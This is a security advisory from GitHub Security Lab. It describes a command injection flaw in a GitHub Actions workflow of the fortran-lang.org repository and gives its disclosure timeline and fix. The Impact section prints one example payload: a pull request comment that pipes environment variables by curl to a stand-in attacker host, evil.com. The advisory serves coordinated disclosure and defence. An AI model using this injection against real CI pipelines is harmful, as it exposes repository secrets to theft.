GHSL-2020-190: Command injection in fortran-lang/fortran-lang.org workflow
Jaroslav LobačevskiCoordinated Disclosure Timeline
- 10/16/2020: Report sent to vendor
- 10/17/2020: Vendor acknowledges
- 10/17/2020: Issue fixed
Summary
The 'gen_tweet.yaml' GitHub workflow is vulnerable to arbitrary command injection.
Product
fortran-lang/fortran-lang.org GitHub repository
Tested Version
gen_tweet.yaml from the master branch.
Details
Issue: The public GitHub issue comment is used to format a shell command
When a user comments on a Pull Request with a #tweet it automatically starts the gen_tweet.yaml GitHub workflow. The comment text is used to format a bash script.
tweet:
runs-on: ubuntu-latest
if: github.event.issue.pull_request && startsWith(github.event.comment.body,'#tweet')
steps:
...
- name: extract the new tweet message
id: get-comment-body
run: |
body=$(echo "${{github.event.comment.body}}" | sed '1 s/#tweet//' | sed '1 s/ //')
...Impact
This vulnerability allows for arbitrary command injection into the bash script. For example a user may comment with #tweet `printenv | curl -X POST --data-binary @- http://evil.com` which will exfiltrate the environment variables to the attacker controlled server. To make the attack less visible the attacker may modify the comment later.
Credit
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2020-190 in any communication regarding this issue.